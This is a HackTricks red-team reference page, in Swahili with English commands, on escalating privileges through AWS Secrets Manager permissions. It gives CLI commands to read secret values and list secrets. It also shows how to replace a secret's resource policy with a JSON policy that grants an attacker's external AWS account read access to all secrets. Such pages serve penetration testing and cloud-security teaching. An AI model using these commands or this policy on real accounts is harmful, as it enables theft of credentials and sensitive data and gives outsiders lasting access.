AWS - Secrets Manager Privesc

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Secrets Manager

Kwa taarifa zaidi kuhusu Secrets Manager angalia:

AWS - Secrets Manager Enum

secretsmanager:GetSecretValue

Attacker akiwa na ruhusa hii anaweza kupata thamani iliyohifadhiwa ndani ya secret katika AWS Secretsmanager.

aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Athari Inayowezekana: Kufikia data nyeti sana ndani ya AWS secrets manager service.

Warning

Kumbuka kwamba hata ukiwa na ruhusa ya secretsmanager:BatchGetSecretValue, mshambuliaji pia atahitaji secretsmanager:GetSecretValue ili kupata siri nyeti.

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

Kwa ruhusa zilizotajwa hapo awali inawezekana kutoa ufikiaji kwa principals/accounts (hata za nje) kufikia siri. Kumbuka kwamba ili kusoma siri zilizofichwa kwa kutumia KMS key, mtumiaji pia anahitaji kuwa na ufikiaji wa KMS key (more info in the KMS Enum page).

aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<attackers_account>:root"
},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*"
}
]
}

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks